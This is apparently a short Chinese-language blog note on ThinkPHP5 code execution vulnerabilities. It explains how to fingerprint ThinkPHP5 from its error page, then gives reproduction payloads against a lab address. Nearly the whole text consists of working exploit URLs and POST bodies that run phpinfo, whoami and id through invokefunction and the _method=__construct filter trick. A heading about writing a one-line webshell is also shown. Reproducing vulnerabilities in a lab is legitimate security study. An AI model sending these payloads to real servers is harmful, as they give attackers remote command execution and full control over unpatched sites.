ThinkPHP代码执行漏洞_thinkphp5 漏洞

一、ThinkPHP5代码执行漏洞

特征：被检测系统报错页面出现“十年磨一剑-为API开发设计的高性能框架”，则判定该系统使用ThinkPHP5开发

二、复现

1)

访问
poc：http://192.168.133.128:8080/index.php?s=1/2/3/${phpinfo()}
写入一句话木马：

2)

访问：

poc：
http://192.168.133.128:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
任意代码执行：
http://192.168.133.128:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

3)

访问：
poc1:
_method=__construct&filter[]=system&method=get&get[]=whoami
poc2:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id